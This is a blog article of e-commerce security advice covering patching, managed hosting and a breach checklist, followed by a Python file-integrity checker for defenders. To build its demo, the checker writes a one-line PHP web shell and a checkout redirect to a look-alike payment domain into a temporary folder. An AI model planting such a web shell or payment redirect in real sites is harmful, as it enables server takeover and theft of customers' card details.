Robust e-commerce: 2 ways to protect your customers from data breaches
- Business Savvy
- Web Development
Many brands have been subjected to malicious attacks. Whether they are government departments or e-commerce businesses, behind them are customers who’ve had their personal data stolen. And what do customers think about this? According to a study by KPMG, 19% say they’d stop shopping at a retailer altogether and a further 33% wouldn’t shop there for a while.
If the biggest global brands are not impervious to hacking, are you confident your systems (and customers) are safe? Maybe you think you’re too small for hackers to notice. And even so, you have great developers, respected payment platforms and robust processes. You’re safe enough.
But did you know:
- All data is at risk online: attackers are well informed and persistent, and they will keep probing until they find a way into your systems.
- Once your website is under attack, you’re on the clock. Your website needs to be strong enough to resist for as long as possible while you rally the troops.
- Once an attack is under way, however well built your website is, it takes a human responder to stop a human attacker from reaching valuable information.
Now, we’re e-commerce specialists (not cyber security specialists) and, as such, we know there are two elements you have full control over, both of which considerably influence how robust your digital platforms are: your site software and your server environment. If you don’t attend to these, a breach becomes far more likely. And it will cost you: in customers, partners, revenue and fines.
1. Update and upgrade your site software
All websites should have their software updated regularly to close the security holes attackers exploit, often within days of a patch being published. E-commerce sites are most at risk, but don’t let your guard down on your brochure site either. Updating Magento, Sitecore, Drupal or WordPress promptly is usually straightforward; subscribe to the vendor’s security announcements so you hear about patches as soon as they are released. The cost depends on the plugins or extensions you’re running on top of the core software: a patch might be free, or a big update might require payment and some work to keep extensions compatible.
On the other hand, unpatched, insecure platforms make it possible for attackers to upload their own files to the server and harvest customers’ financial information. Once they can write files, it’s an easy task for them to alter the checkout so that, at the point of payment, it redirects to a site that looks like a genuine payment portal, or to inject a script that copies card details as customers type them.
Payment partners (like WorldPay, Sage Pay, PayPal and others) handle card data on your behalf, which reduces your own Payment Card Industry Data Security Standard (PCI DSS) scope but does not remove it: your side of the agreement is to keep the platform that hosts the checkout secure, which means updated. There’s a risk they could terminate your contract if you don’t. It goes without saying that any website storing users’ personal data has to be secure for GDPR purposes too.
While updates are patches that minimise security risks on your existing software, consider upgrades as your growth solution, for example upgrading from Magento 1 to Magento 2. Upgrades offer your customers a more sophisticated user experience, which is vital to helping your business achieve its potential. They also matter for security: an older major version eventually reaches end of life and stops receiving security patches, and from that point no amount of updating keeps it safe. Digital channels like websites always need to work better: faster, more intuitively.
The longer you wait to upgrade, the sooner your site starts to look outdated. This is the antithesis of your growth strategy, certainly if you’re transacting online, because in the eyes of the customer outdated means unsafe. Often, upgrading is essential to simply maintain your market position, depending on how fast your competitors are acting.
2. Choose a server package that meets your needs
Your goal is to slow attackers down, to give your systems admin enough time to detect the intrusion and neutralise it. Once an attack has begun, a breach becomes a matter of time if nobody responds. Where you host your website, your server, is one of the most important factors in online security. It has to be a hardened environment because it is the first thing an attacker touches.
There are two key types of hosting.
- Unmanaged service (you need to engage a system admin, a human, to patch and troubleshoot)
- Managed service (comes with a system admin; what they are responsible for varies, so check the contract)
The server operating system (like Ubuntu and CentOS) and the services running on it (web server, PHP, database) have to be updated regularly to keep them secure and running optimally. While an unmanaged service will suit some businesses, we generally recommend a managed service with at least half a day a week for updating and testing server software.
Why might you need a managed service? CentOS, for example, can apply package updates automatically (yum-cron; Ubuntu has unattended-upgrades). Automatic updates are great in principle, but an update applied untested to a live server can break a dependency or a service, which leads to costly and inconvenient downtime and lost revenue. With a managed service, your system admin applies the update first in a staging environment that mirrors production, tests it, and only then rolls it out. Half a day a week is the bare minimum; expect a systems admin (or web developer) to occasionally need more for ad hoc testing and fixing.
Technology is amazing, but the only way to stop a well-informed and persistent human attacker is intervention by a well-informed and tenacious human systems admin. This is why the role of your systems admin is so critical. Emergency intervention might mean pulling the website down. It usually means rebuilding the site on a clean server from known-good code and backups rather than patching the compromised one, and preserving the compromised server’s logs and disk image for investigation before anything is wiped.
- Updating and appropriately upgrading your site and server is business critical
- Server updates will help slow attackers down until a systems admin can take action to prevent a data breach
- Ensure your systems admin takes a proactive role in your server security and updates
- Create a data breach emergency plan (who is called, how the site is taken offline, how evidence is preserved, who informs customers and the regulator) and review it regularly
- Identify with your systems admin quiet times to schedule updates so there’s less inconvenience to customers
- Ensure your systems admin keeps the database and admin interfaces off the public internet (database bound to localhost or a private network, admin URL restricted by IP) and has switched on notifications that alert on changes to critical back-end files and configuration
- Introduce robust internal security processes: individual user accounts, strong unique passwords with two-factor authentication where available, and data access rights limited to what each person needs
- Deal with these issues now and incorporate good security into your processes
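The two concrete threats this article mentions, an attacker uploading their own files to the server and the checkout being altered to redirect payments, are exactly what the checklist item about alerting on changes to critical back-end systems is meant to catch. The following is an added example, not code from the original article: a minimal file-integrity check that baselines a web root with SHA-256 hashes, re-scans it, and turns the differences into alerts. The directory layout follows Magento 2 conventions and every file, including the attacker’s web shell and the redirect to `pay-portal.example`, is constructed for the demo.

```python
"""
Added example, not code from the original article: a minimal file-integrity
check for an e-commerce web root. It records a baseline of SHA-256 hashes,
re-scans later, and turns the differences into alerts, which is how an
attacker-dropped PHP file in an upload directory or an edited checkout
template becomes visible. Directory names follow a Magento 2 layout and the
file contents, including the attacker's changes, are constructed for the demo.
"""
import hashlib
import json
import tempfile
from pathlib import Path

# Directories that legitimately churn; excluding them keeps the report usable.
EXCLUDE_DIRS = ("var/cache", "var/log", "var/session", "var/page_cache")
# Web-writable directories where a legitimate deploy never places code.
UPLOAD_DIRS = ("pub/media/",)
CODE_SUFFIXES = (".php", ".phtml", ".phar")
TEMPLATE_SUFFIXES = CODE_SUFFIXES + (".js", ".html")


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large media files don't exhaust memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Return {relative_path: sha256} for every regular file under root."""
    baseline = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if any(rel.startswith(d + "/") for d in EXCLUDE_DIRS):
            continue
        baseline[rel] = hash_file(path)
    return baseline


def diff_baseline(old: dict, new: dict) -> dict:
    """Files added, removed or modified between two baselines."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
    }


def triage(changes: dict) -> list:
    """Rank the raw differences: new code in an upload dir is the classic
    web-shell drop; a changed template or script is the classic checkout
    redirect or card skimmer. Everything else is left for a human to review."""
    alerts = []
    for rel in changes["added"]:
        if rel.startswith(UPLOAD_DIRS) and rel.endswith(CODE_SUFFIXES):
            alerts.append(f"CRITICAL new code in upload dir: {rel}")
    for rel in changes["modified"]:
        if rel.endswith(TEMPLATE_SUFFIXES):
            alerts.append(f"HIGH modified code/template: {rel}")
    return alerts


def demo() -> dict:
    """Build a toy web root, baseline it, simulate two attacker changes plus
    harmless log churn, and return the differences and alerts."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        files = {  # constructed sample site
            "index.php": "<?php require 'app/bootstrap.php';\n",
            "app/design/frontend/checkout/payment.phtml":
                '<form action="/checkout/payment" method="post"></form>\n',
            "pub/media/catalog/product/shoe.jpg": "JPEGDATA",
            "var/log/system.log": "boot\n",
        }
        for rel, body in files.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        baseline = build_baseline(root)

        # Attacker: drop a web shell through an upload flaw, then point the
        # checkout at a look-alike payment page (domain constructed for the demo).
        (root / "pub/media/wysiwyg").mkdir(parents=True)
        (root / "pub/media/wysiwyg/shell.php").write_text("<?php eval($_POST['c']);\n")
        with (root / "app/design/frontend/checkout/payment.phtml").open("a") as f:
            f.write('<script>location.replace("https://pay-portal.example/")</script>\n')
        (root / "var/log/system.log").write_text("more entries\n")  # excluded: no alert

        changes = diff_baseline(baseline, build_baseline(root))
        return {"changes": changes, "alerts": triage(changes)}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In practice you take the baseline from a known-good deployment, store it somewhere the web server cannot write (an attacker who can drop files can also edit a baseline kept on the same box), and run the comparison from cron so the alerts reach a human. Mature tools such as AIDE do the same job with more care; the point of the demo is that a changed checkout template or a new `.php` file under a media directory is a loud, cheap signal that should page someone.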
Photo by rawpixel on Unsplash. This article first appeared on Medium.
02.05.2019